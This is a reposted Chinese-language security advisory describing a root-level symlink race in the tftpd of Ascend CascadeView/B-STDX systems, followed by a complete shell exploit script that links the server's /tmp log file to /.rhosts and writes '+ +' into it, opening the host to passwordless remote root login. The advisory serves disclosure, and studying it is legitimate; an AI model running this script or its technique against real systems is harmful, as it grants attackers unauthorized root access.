Ascend CascadeView tftpd链接漏洞

时间:2004-04-12 08:19 来源:网管之家bitsCN.com 字体:[ ] 评论:
发布时间:2000-05-03
更新时间:2000-05-03
严重程度:高
威胁程度:普通用户访问权限
错误类型:竞争条件
利用方式:服务器模式

受影响系统
Ascend CascadeView/UX 1.0\Ascend B-STDX 9000 1.0\Ascend B-STDX 8000 1.0
详细描述
Ascend CascadeView tftpd在/tmp下建立了一个叫tftpd_xfer_status.log的临时文件,如果/tmp/tftpd_xfer_status.log是一个已经存在的链接的话,它将以root权限更改链接指向的文件,入侵者可以利用它来那立诸如/.rhosts之类的文件。

测试代码
下面是它的利用代码:

#!/bin/sh
#
# tftpserv.sh - Loneguard 07/03/99
#
# Buggy tftp server shipped with CascadeView B-STDX 8000/9000
#
rm /tmp/tftpd_xfer_status.log
ln -s /.rhosts /tmp/tftpd_xfer_status.log
echo KungFu > crazymonkey
( sleep 1 ; echo put crazymonkey ; sleep 1 ; echo quit ) | tftp 127.1
echo "+ +" > /.rhosts

解决方案
尚无

相关信息
顶一下(0) 踩一下(0)
Top_arrow